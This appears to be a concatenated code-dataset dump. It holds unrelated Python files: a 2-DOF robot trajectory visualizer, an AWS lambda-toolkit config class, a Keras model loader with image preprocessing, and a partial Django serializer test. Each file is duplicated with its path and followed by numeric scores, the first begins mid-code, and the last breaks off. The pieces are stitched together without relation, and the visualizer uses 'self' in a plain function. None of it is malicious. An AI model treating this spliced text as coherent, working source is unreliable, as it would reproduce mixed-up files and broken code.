algorithm = pth.split('/')[2] #+ '-' + dt
result = torch.load(pth)
if algorithm in results and not is_one_model:
start = len(results[algorithm])
end = len(results[algorithm]) + len(result)
j = 0
for i in range(start, end):
results[algorithm][i] = result[j]
j += 1
elif algorithm in results and is_one_model:
results[algorithm + "-" + str(seed)] = result
seed += 1
else:
results[algorithm] = result
result = results[visualize]
#LOOK AT TRAJECTORIES AND POSES IN ENVIRONMENT
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
num_pts = 1
pts_dim= 2
num_actuators = 2
state_extractor = StateExtractor(num_points=num_pts, point_dim=pts_dim, num_angles=num_actuators)
dt = 0.05
L1 = 0.3143
L2 = 0.1674 + 0.120
Z_OFFSET = 0.7052
gym = SerialTwoDOFGym(L1= L1, L2= L2)
def transform_coords(vec):
#Converts (x,y,z) ==> (x,y) plane treating new_x = z, new_y = x
new_x = vec[2] - self.Z_OFFSET
new_y = vec[0]
return np.array([new_x, new_y])
for k in result.keys():
trajectory = result[k]
print("Trajectory: {} length {}".format(k, len(trajectory)))
steps = 0
psn, trg = state_extractor.get_position_and_target(trajectory[0][5])
if np.linalg.norm(trg - psn, 2) < 1.0 and np.linalg.norm(trg - psn, 2) >= 0.75:
for v in trajectory:
steps += 1
state = v[0]
ths = state_extractor.get_angles(state)
psn, trg = state_extractor.get_position_and_target(state)
#trg = transform_coords(trg)
gym.target = trg
gym.th1 = ths[0]
gym.th2 = ths[1]
gym.update_psn()
gym.render() | src/viz_robot_traj.py | from environments import SerialTwoDOFGym
from visualservoing.state_extractory import StateExtractor
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import torch
import glob
#HELPER FUNCTION
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
def check_pos_definite(A):
eigs = np.linalg.eigvals(A)
return (eigs > 0).all()
#GET DATA
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
visualize = "2-dof-inversejacobian"
#visualize="blackbox-kinematics-custom"
#visualize="global-neuralnetwork-multitask-custom"
directories = glob.glob('.experiments/kinova-2d-planar_analysis_take2/{}/*/result*.pth'.format(visualize))
#load each
results = {}
seed = 0
is_one_model = False
for pth in directories:
dt = pth.split('/')[-1].split('-dt-')[-1].split('-')[0]
algorithm = pth.split('/')[2] #+ '-' + dt
result = torch.load(pth)
if algorithm in results and not is_one_model:
start = len(results[algorithm])
end = len(results[algorithm]) + len(result)
j = 0
for i in range(start, end):
results[algorithm][i] = result[j]
j += 1
elif algorithm in results and is_one_model:
results[algorithm + "-" + str(seed)] = result
seed += 1
else:
results[algorithm] = result
result = results[visualize]
#LOOK AT TRAJECTORIES AND POSES IN ENVIRONMENT
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
num_pts = 1
pts_dim= 2
num_actuators = 2
state_extractor = StateExtractor(num_points=num_pts, point_dim=pts_dim, num_angles=num_actuators)
dt = 0.05
L1 = 0.3143
L2 = 0.1674 + 0.120
Z_OFFSET = 0.7052
gym = SerialTwoDOFGym(L1= L1, L2= L2)
def transform_coords(vec):
#Converts (x,y,z) ==> (x,y) plane treating new_x = z, new_y = x
new_x = vec[2] - self.Z_OFFSET
new_y = vec[0]
return np.array([new_x, new_y])
for k in result.keys():
trajectory = result[k]
print("Trajectory: {} length {}".format(k, len(trajectory)))
steps = 0
psn, trg = state_extractor.get_position_and_target(trajectory[0][5])
if np.linalg.norm(trg - psn, 2) < 1.0 and np.linalg.norm(trg - psn, 2) >= 0.75:
for v in trajectory:
steps += 1
state = v[0]
ths = state_extractor.get_angles(state)
psn, trg = state_extractor.get_position_and_target(state)
#trg = transform_coords(trg)
gym.target = trg
gym.th1 = ths[0]
gym.th2 = ths[1]
gym.update_psn()
gym.render() | 0.301465 | 0.520009 |
import lambda_toolkit.modules.logger as logger
from lambda_toolkit.modules.utils import Utils
import os
import json
import pkgutil
import boto3
from shutil import copytree
class Conf:
def __init__(self):
self.config_file = os.path.join(os.path.expanduser('~'), ".lambda-toolkit.json")
self.log = logger.get_my_logger("lambda-toolkit")
# Get default configuration
default_conf = json.loads(pkgutil.get_data("lambda_toolkit", "data/lambda-toolkit.json"))
self.cli = default_conf['cli']
self.aws_regions = default_conf['aws-regions']
# Keep compatibility with previous versions
self.sett = self._sync_settings(default_conf)
self._copy_default_folder()
self._set_authmode_and_default_region()
def set_region(self, region):
self.region = region
if 'configurations' not in self.json_conf:
self.json_conf['configurations'] = {}
if self.region not in self.json_conf['configurations']:
self.json_conf['configurations'][self.region] = {}
confs = list(self.cli)
# plural issue
confs.remove("proxy")
confs.append("proxie")
for c in confs:
c = c + "s"
if c not in self.json_conf['configurations'][self.region]:
self.json_conf['configurations'][self.region][c] = {}
setattr(self, c, self.json_conf['configurations'][self.region][c])
return self
def save_config(self):
with open(self.config_file, "w") as f:
f.write(json.dumps(self.json_conf, indent=4))
def get_boto3(self, api_name, api_method):
func = getattr(__import__("boto3"), api_method)
if self.auth_mode == "env":
return func(
api_name,
aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
region_name=self.region
)
else:
return func(api_name, region_name=self.region)
def _set_authmode_and_default_region(self):
self.auth_mode = "env"
for env_var in ['AWS_REGION', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']:
if env_var not in os.environ:
self.auth_mode = "file"
s = boto3.session.Session().region_name
if s is None:
self.log.critical("Cannot read 'region' from env or credential file")
self.set_region(boto3.session.Session().region_name)
break
if self.auth_mode == "env":
self.set_region(os.environ['AWS_REGION'])
def _copy_default_folder(self):
if not os.path.exists(Utils.fixpath(self.sett['C_BASE_DIR'])):
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if not os.path.exists(Utils.fixpath(self.sett['C_BASE_DIR'])):
copytree(os.path.join(path, Utils.fixpath(self.sett['C_STANDARD_FOLDER_DIR'])),
Utils.fixpath(self.sett['C_BASE_DIR']))
def _sync_settings(self, default_conf):
if os.path.isfile(self.config_file):
with open(self.config_file, "r") as f:
self.json_conf = json.loads(f.read())
# Check for new settings (Make compatible with older versions)
for setting in default_conf['settings']:
if setting not in self.json_conf['settings']:
self.log.debug("Adding new setting: " + setting)
self.json_conf['settings'][setting] = default_conf['settings'][setting]
# Remove deprecated settings
remove_list = []
for setting in self.json_conf['settings']:
if setting not in default_conf['settings']:
self.log.debug("Removing old setting: " + setting)
remove_list.append(setting)
for r in remove_list:
self.json_conf['settings'].pop(r)
else:
self.json_conf = {}
self.json_conf['settings'] = default_conf['settings']
return self.json_conf['settings'] | lambda_toolkit/modules/conf.py |
import lambda_toolkit.modules.logger as logger
from lambda_toolkit.modules.utils import Utils
import os
import json
import pkgutil
import boto3
from shutil import copytree
class Conf:
def __init__(self):
self.config_file = os.path.join(os.path.expanduser('~'), ".lambda-toolkit.json")
self.log = logger.get_my_logger("lambda-toolkit")
# Get default configuration
default_conf = json.loads(pkgutil.get_data("lambda_toolkit", "data/lambda-toolkit.json"))
self.cli = default_conf['cli']
self.aws_regions = default_conf['aws-regions']
# Keep compatibility with previous versions
self.sett = self._sync_settings(default_conf)
self._copy_default_folder()
self._set_authmode_and_default_region()
def set_region(self, region):
self.region = region
if 'configurations' not in self.json_conf:
self.json_conf['configurations'] = {}
if self.region not in self.json_conf['configurations']:
self.json_conf['configurations'][self.region] = {}
confs = list(self.cli)
# plural issue
confs.remove("proxy")
confs.append("proxie")
for c in confs:
c = c + "s"
if c not in self.json_conf['configurations'][self.region]:
self.json_conf['configurations'][self.region][c] = {}
setattr(self, c, self.json_conf['configurations'][self.region][c])
return self
def save_config(self):
with open(self.config_file, "w") as f:
f.write(json.dumps(self.json_conf, indent=4))
def get_boto3(self, api_name, api_method):
func = getattr(__import__("boto3"), api_method)
if self.auth_mode == "env":
return func(
api_name,
aws_access_key_id=os.environ['AWS_ACCESS_KEY_ID'],
aws_secret_access_key=os.environ['AWS_SECRET_ACCESS_KEY'],
region_name=self.region
)
else:
return func(api_name, region_name=self.region)
def _set_authmode_and_default_region(self):
self.auth_mode = "env"
for env_var in ['AWS_REGION', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']:
if env_var not in os.environ:
self.auth_mode = "file"
s = boto3.session.Session().region_name
if s is None:
self.log.critical("Cannot read 'region' from env or credential file")
self.set_region(boto3.session.Session().region_name)
break
if self.auth_mode == "env":
self.set_region(os.environ['AWS_REGION'])
def _copy_default_folder(self):
if not os.path.exists(Utils.fixpath(self.sett['C_BASE_DIR'])):
path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if not os.path.exists(Utils.fixpath(self.sett['C_BASE_DIR'])):
copytree(os.path.join(path, Utils.fixpath(self.sett['C_STANDARD_FOLDER_DIR'])),
Utils.fixpath(self.sett['C_BASE_DIR']))
def _sync_settings(self, default_conf):
if os.path.isfile(self.config_file):
with open(self.config_file, "r") as f:
self.json_conf = json.loads(f.read())
# Check for new settings (Make compatible with older versions)
for setting in default_conf['settings']:
if setting not in self.json_conf['settings']:
self.log.debug("Adding new setting: " + setting)
self.json_conf['settings'][setting] = default_conf['settings'][setting]
# Remove deprecated settings
remove_list = []
for setting in self.json_conf['settings']:
if setting not in default_conf['settings']:
self.log.debug("Removing old setting: " + setting)
remove_list.append(setting)
for r in remove_list:
self.json_conf['settings'].pop(r)
else:
self.json_conf = {}
self.json_conf['settings'] = default_conf['settings']
return self.json_conf['settings'] | 0.196209 | 0.046335 |
from keras.models import load_model
from keras.models import model_from_json
# internal package
from src.infra import infra
# Initialize Global alias
_appendListElement = infra._appendListElement
_getSplitedStringByIndex = infra._getSplitedStringByIndex
_getElementByIndex = infra._getElementByIndex
_getFilesFromFolder = infra._getFilesFromFolder
_getFilePathAndName = infra._getFilePathAndName
_openImageFile = infra._openImageFile
_imageToNumpyArray = infra._imageToNumpyArray
_renderRGBImage = infra._renderRGBImage
_renderRGBtoGrayImage = infra._renderRGBtoGrayImage
_resizeImageByModelInputShape = infra._resizeImageByModelInputShape
_normalizeImage = infra._normalizeImage
_reshapeGrayImage = infra._reshapeGrayImage
_expandRGBImageDimensions = infra._expandRGBImageDimensions
def _buildDictModel(list_model) -> list:
"""
_buildDictModel() : Provide a collection of model name and collection of model path
This function will help to build Model dictionary by providing each key and value
This function will handle both of json model or h5 model
ACCEPT list of model either json or h5 model as argument
RETURN keys, values
RETURN EXAMPLE :
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES : ['static/model/BALANCE_model.h5', 'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
keys = []
values = []
for model in list_model:
if type(model) == list: # handle json model (include json model and h5 weight)
getModelPath = _getElementByIndex(model, 0)
get_model_and_ext = _getSplitedStringByIndex(getModelPath, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
else: # handle hdf5 or H5 model
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
return keys, values
def _buildListModel(path):
"""
_buildListModel() : Provide a collection of model and weight path
This function will help to build Model dictionary by providing a collection model and weight path
either json model or hdf5 model. This function will scan all model by pattern name such (model.json,
weights.h5, weights.hdf5, model.h5, and model.hdf5) UPDATED SOON
ACCEPT path of model directory as argument
RETURN json_model and hdf5_model which is containing each model path
RETURN EXAMPLE :
* JSON_MODEL : [ ['static/model/BALANCE_model.json', 'static/model/BALANCE_weight.h5'],
['static/model/SPLIT_AUGMENTATION_model.json', 'static/model/SPLIT_AUGMENTATION_weight.h5'],
]
* HDF5_MODEL : ['static/model/BALANCE_model.h5', 'static/model/SPLIT_AUGMENTATION_model.h5']
"""
json_arch = []
json_weight = []
hdf5_model = []
json_model = []
files_in_folder = _getFilesFromFolder(path) # scan all model in path directory
for data in files_in_folder: # iterate files_in_folder to extract model and weight information
if "model.json" in data: # get model json by partter name <model.json>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(json_arch, file_name_and_path)
elif "weights.h5" in data or "weights.hdf5" in data: # get model weight by partter name <weights.h5 or weights.hdf5>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(json_weight, file_name_and_path)
elif "model.h5" in data or "model.hdf5" in data: # get model by partter name <model.h5 or model.hdf5>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(hdf5_model, file_name_and_path)
if json_arch and json_weight: # build json model collection (it would return list of json model and realted weight)
json_model = _getJsonModel(json_arch, json_weight)
return json_model, hdf5_model
def _getDictModel(path):
"""
_getDictModel() : Provide a collection of model and weight either json or h5 model including model name as keys and model path as values of dictionary
This function will help to generate model information for service and application layer.
This function used _buildListModel and _buildDictModel as helper. For detail please see the documentation of each fuction.
ACCEPT path of model directory as argument
RETURN dicts, keys and values which is containing model information such path and model name.
RETURN EXAMPLE :
* DICTS : {
'BALANCE_model': 'static/model/BALANCE_model.h5',
'IMBALANCE_model': 'static/model/IMBALANCE_model.h5',
'SPLIT_AUGMENTATION_model': 'static/model/SPLIT_AUGMENTATION_model.h5'
}
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES: ['static/model/BALANCE_model.h5',
'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
dicts = {}
keys = []
values = []
json_model, hdf5_model = _buildListModel(path)
if json_model:
keys, values = _buildDictModel(json_model)
if hdf5_model:
keys, values = _buildDictModel(hdf5_model)
for i in range(len(keys)):
data = _getElementByIndex(keys, i)
dicts[data] = values[i]
return dicts, keys, values
def _loadSelectModel(model, path):
"""
_loadSelectModel() : This config function used to load selected model. It would help to load model into keras sequential model either json or h5 model.
ACCEPT selected model and path of model directory as argument
RETURN keras sequential model <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
RETURN EXAMPLE :
* LOADED_MODEL : <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
"""
model_dict, _, _ = _getDictModel(path)
for data in model_dict:
if data == model:
model_and_weight = _getElementByIndex(model_dict, data)
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight)
return loaded_model
def _loadCompareModel(list_model, path):
"""
_loadCompareModel() : This config function used to load selected models. It would help to load all selected model into keras sequential model either json or h5 model.
This function will provide a collection of keras sequential model that can be use for service layer.
ACCEPT selected list_model and path of model directory as argument
RETURN a collection of keras sequential model [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
RETURN EXAMPLE :
* LIST_OFMODEL : [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
"""
model_dict, _, _ = _getDictModel(path)
list_ofModel = []
for data in list_model:
model_and_weight = _getElementByIndex(model_dict, data)
if data in model_dict:
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
_appendListElement(list_ofModel, loaded_model) # append loaded model with weight into list_OfModel
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight) # load h5 or hdf5 model
_appendListElement(list_ofModel, loaded_model) # append model into list_OfModel
return list_ofModel
def _getJsonModel(models, weights)-> list:
"""
_getJsonModel() : Provide a collection of json model with each weight. It would be helpfull for build a collection of json model that
might be loaded
ACCEPT json models and weights of each json model as argument
RETURN a collection of json model and each weight
RETURN EXAMPLE :
* LIST_OFMODEL : [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
"""
sub_value = []
json_model = []
models.sort(reverse=True) # sort model in dsc term or reverse term
weights.sort() # sort weight in asc term
for weight in weights:
model = models.pop() # get model name and pop it up
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1) # example result: VGG19_model.json
model_name = _getSplitedStringByIndex(get_model_and_ext, "_", 0) # example result: VGG19
if model_name in weight: # check is model_name value is in weight list (find string by pattern)
_appendListElement(sub_value, model)
_appendListElement(sub_value, weight)
_appendListElement(json_model, sub_value)
sub_value = []
return json_model
def _rgbImageProcessing(image_file, keras_model):
"""
_rgbImageProcessing() : Provide a RGB image preprocessing for raw query image based on model input volume information
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
...
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]]
...
[[0.02352941 0.02352941 0.02352941]
[0.03529412 0.03529412 0.03529412]
[0.03137255 0.03137255 0.03137255]
...
[0.02745098 0.02745098 0.02745098]
[0.02352941 0.02352941 0.02352941]
[0.01960784 0.01960784 0.01960784]]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
resizeImage ,_ ,_ = _resizeImageByModelInputShape(convertToRGB, keras_model) # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
resultImage = _expandRGBImageDimensions(normalizeImage, 0) # expanding image dimention for prediction
return resultImage
def _grayImageProcessing(image_file, model):
"""
_grayImageProcessing() : Provide a Grayscale image preprocessing for raw query image based on model input volume information
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[0.00784314]
[0.00784314]
[0.00784314]
...
[0.00392157]
[0.00392157]
[0.00392157]]
...
[[0.02352941]
[0.03529412]
[0.03137255]
...
[0.02745098]
[0.02352941]
[0.01960784]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
convertToGray = _renderRGBtoGrayImage(convertToRGB) # change image type from RGB into Grayscale
resizeImage ,_ ,image_size = _resizeImageByModelInputShape(convertToGray, model) # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
resultImage = _reshapeGrayImage(normalizeImage, image_size) # expanding image dimention for prediction
return resultImage | refactoring_project/src/config/config.py | from keras.models import load_model
from keras.models import model_from_json
# internal package
from src.infra import infra
# Initialize Global alias
_appendListElement = infra._appendListElement
_getSplitedStringByIndex = infra._getSplitedStringByIndex
_getElementByIndex = infra._getElementByIndex
_getFilesFromFolder = infra._getFilesFromFolder
_getFilePathAndName = infra._getFilePathAndName
_openImageFile = infra._openImageFile
_imageToNumpyArray = infra._imageToNumpyArray
_renderRGBImage = infra._renderRGBImage
_renderRGBtoGrayImage = infra._renderRGBtoGrayImage
_resizeImageByModelInputShape = infra._resizeImageByModelInputShape
_normalizeImage = infra._normalizeImage
_reshapeGrayImage = infra._reshapeGrayImage
_expandRGBImageDimensions = infra._expandRGBImageDimensions
def _buildDictModel(list_model) -> list:
"""
_buildDictModel() : Provide a collection of model name and collection of model path
This function will help to build Model dictionary by providing each key and value
This function will handle both of json model or h5 model
ACCEPT list of model either json or h5 model as argument
RETURN keys, values
RETURN EXAMPLE :
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES : ['static/model/BALANCE_model.h5', 'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
keys = []
values = []
for model in list_model:
if type(model) == list: # handle json model (include json model and h5 weight)
getModelPath = _getElementByIndex(model, 0)
get_model_and_ext = _getSplitedStringByIndex(getModelPath, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
else: # handle hdf5 or H5 model
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1)
get_model_name = _getSplitedStringByIndex(get_model_and_ext, ".", 0)
_appendListElement(keys, get_model_name)
_appendListElement(values, model)
return keys, values
def _buildListModel(path):
"""
_buildListModel() : Provide a collection of model and weight path
This function will help to build Model dictionary by providing a collection model and weight path
either json model or hdf5 model. This function will scan all model by pattern name such (model.json,
weights.h5, weights.hdf5, model.h5, and model.hdf5) UPDATED SOON
ACCEPT path of model directory as argument
RETURN json_model and hdf5_model which is containing each model path
RETURN EXAMPLE :
* JSON_MODEL : [ ['static/model/BALANCE_model.json', 'static/model/BALANCE_weight.h5'],
['static/model/SPLIT_AUGMENTATION_model.json', 'static/model/SPLIT_AUGMENTATION_weight.h5'],
]
* HDF5_MODEL : ['static/model/BALANCE_model.h5', 'static/model/SPLIT_AUGMENTATION_model.h5']
"""
json_arch = []
json_weight = []
hdf5_model = []
json_model = []
files_in_folder = _getFilesFromFolder(path) # scan all model in path directory
for data in files_in_folder: # iterate files_in_folder to extract model and weight information
if "model.json" in data: # get model json by partter name <model.json>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(json_arch, file_name_and_path)
elif "weights.h5" in data or "weights.hdf5" in data: # get model weight by partter name <weights.h5 or weights.hdf5>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(json_weight, file_name_and_path)
elif "model.h5" in data or "model.hdf5" in data: # get model by partter name <model.h5 or model.hdf5>
file_name_and_path = _getFilePathAndName(path, data)
_appendListElement(hdf5_model, file_name_and_path)
if json_arch and json_weight: # build json model collection (it would return list of json model and realted weight)
json_model = _getJsonModel(json_arch, json_weight)
return json_model, hdf5_model
def _getDictModel(path):
"""
_getDictModel() : Provide a collection of model and weight either json or h5 model including model name as keys and model path as values of dictionary
This function will help to generate model information for service and application layer.
This function used _buildListModel and _buildDictModel as helper. For detail please see the documentation of each fuction.
ACCEPT path of model directory as argument
RETURN dicts, keys and values which is containing model information such path and model name.
RETURN EXAMPLE :
* DICTS : {
'BALANCE_model': 'static/model/BALANCE_model.h5',
'IMBALANCE_model': 'static/model/IMBALANCE_model.h5',
'SPLIT_AUGMENTATION_model': 'static/model/SPLIT_AUGMENTATION_model.h5'
}
* KEYS : ['BALANCE_model', 'IMBALANCE_model', 'SPLIT_AUGMENTATION_model']
* VALUES: ['static/model/BALANCE_model.h5',
'static/model/IMBALANCE_model.h5',
'static/model/SPLIT_AUGMENTATION_model.h5']
"""
dicts = {}
keys = []
values = []
json_model, hdf5_model = _buildListModel(path)
if json_model:
keys, values = _buildDictModel(json_model)
if hdf5_model:
keys, values = _buildDictModel(hdf5_model)
for i in range(len(keys)):
data = _getElementByIndex(keys, i)
dicts[data] = values[i]
return dicts, keys, values
def _loadSelectModel(model, path):
"""
_loadSelectModel() : This config function used to load selected model. It would help to load model into keras sequential model either json or h5 model.
ACCEPT selected model and path of model directory as argument
RETURN keras sequential model <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
RETURN EXAMPLE :
* LOADED_MODEL : <keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>
"""
model_dict, _, _ = _getDictModel(path)
for data in model_dict:
if data == model:
model_and_weight = _getElementByIndex(model_dict, data)
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight)
return loaded_model
def _loadCompareModel(list_model, path):
"""
_loadCompareModel() : This config function used to load selected models. It would help to load all selected model into keras sequential model either json or h5 model.
This function will provide a collection of keras sequential model that can be use for service layer.
ACCEPT selected list_model and path of model directory as argument
RETURN a collection of keras sequential model [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
RETURN EXAMPLE :
* LIST_OFMODEL : [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
"""
model_dict, _, _ = _getDictModel(path)
list_ofModel = []
for data in list_model:
model_and_weight = _getElementByIndex(model_dict, data)
if data in model_dict:
if type(model_and_weight) == list and model_and_weight: # handle json model and weight
model_name = _getElementByIndex(model_and_weight, 0) # get json model name
weight_name = _getElementByIndex(model_and_weight, 1) # get model weight
json_file = open(model_name, 'r') # open json model
loaded_model_json = json_file.read() # read json model
json_file.close()
loaded_model = model_from_json(loaded_model_json) # load json model
loaded_model.load_weights(weight_name) # load weight
_appendListElement(list_ofModel, loaded_model) # append loaded model with weight into list_OfModel
else: # handle h5 or hdf5 model
loaded_model = load_model(model_and_weight) # load h5 or hdf5 model
_appendListElement(list_ofModel, loaded_model) # append model into list_OfModel
return list_ofModel
def _getJsonModel(models, weights)-> list:
"""
_getJsonModel() : Provide a collection of json model with each weight. It would be helpfull for build a collection of json model that
might be loaded
ACCEPT json models and weights of each json model as argument
RETURN a collection of json model and each weight
RETURN EXAMPLE :
* LIST_OFMODEL : [<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,
<keras.engine.sequential.Sequential object at 0x000002C8C8AB8550>,]
"""
sub_value = []
json_model = []
models.sort(reverse=True) # sort model in dsc term or reverse term
weights.sort() # sort weight in asc term
for weight in weights:
model = models.pop() # get model name and pop it up
get_model_and_ext = _getSplitedStringByIndex(model, "/", -1) # example result: VGG19_model.json
model_name = _getSplitedStringByIndex(get_model_and_ext, "_", 0) # example result: VGG19
if model_name in weight: # check is model_name value is in weight list (find string by pattern)
_appendListElement(sub_value, model)
_appendListElement(sub_value, weight)
_appendListElement(json_model, sub_value)
sub_value = []
return json_model
def _rgbImageProcessing(image_file, keras_model):
"""
_rgbImageProcessing() : Provide a RGB image preprocessing for raw query image based on model input volume information
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
[0.00784314 0.00784314 0.00784314]
...
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]
[0.00392157 0.00392157 0.00392157]]
...
[[0.02352941 0.02352941 0.02352941]
[0.03529412 0.03529412 0.03529412]
[0.03137255 0.03137255 0.03137255]
...
[0.02745098 0.02745098 0.02745098]
[0.02352941 0.02352941 0.02352941]
[0.01960784 0.01960784 0.01960784]]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
resizeImage ,_ ,_ = _resizeImageByModelInputShape(convertToRGB, keras_model) # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
resultImage = _expandRGBImageDimensions(normalizeImage, 0) # expanding image dimention for prediction
return resultImage
def _grayImageProcessing(image_file, model):
"""
_grayImageProcessing() : Provide a Grayscale image preprocessing for raw query image based on model input volume information
ACCEPT raw image file and keras sequential model as argument
RETURN a numpy array of image which is ready to use for prediction
RETURN EXAMPLE :
* RESULTIMAGE : [[[0.00784314]
[0.00784314]
[0.00784314]
...
[0.00392157]
[0.00392157]
[0.00392157]]
...
[[0.02352941]
[0.03529412]
[0.03137255]
...
[0.02745098]
[0.02352941]
[0.01960784]]]
"""
readImage = _openImageFile(image_file) # open image file
imageNdarray = _imageToNumpyArray(readImage) # transform image into numpy array
convertToRGB = _renderRGBImage(imageNdarray) # change image type from BGR to RGB
convertToGray = _renderRGBtoGrayImage(convertToRGB) # change image type from RGB into Grayscale
resizeImage ,_ ,image_size = _resizeImageByModelInputShape(convertToGray, model) # resize image based on model input shape
normalizeImage = _normalizeImage(resizeImage) # normalize image
resultImage = _reshapeGrayImage(normalizeImage, image_size) # expanding image dimention for prediction
return resultImage | 0.665845 | 0.221298 |
from mock import patch
from django.test import TestCase
from ..serializer import CollaboratorSerializer
class CollaboratorSerializerTests(TestCase):
"""Test RepoSerializer methods"""
def setUp(self):
self.username = "delete_me_username"
self.repo_base = "delete_me_repo_base"
self.password = "<PASSWORD>"
self.mock_manager = self.create_patch(
'api.serializer.DataHubManager')
self.mock_reverse = self.create_patch(
'api.serializer.reverse')
self.mock_reverse.return_value = ('mock_url')
self.serializer = CollaboratorSerializer(
username=self.username, repo_base=self.repo_base)
def create_patch(self, name):
# helper method for creating patches
patcher = patch(name)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def test_list_collaborators(self):
list_collab_result = [
{'username': 'collab1', 'privileges': 'UC'},
{'username': 'collab2', 'privileges': 'U'}]
mock_list_collabs = self.mock_manager.return_value.list_collaborators
mock_list_collabs.return_value = list_collab_result
expected_result = {'collaborators': [
{'username': 'collab1', 'href': 'mock_url'},
{'username': 'collab2', 'href': 'mock_url'}]}
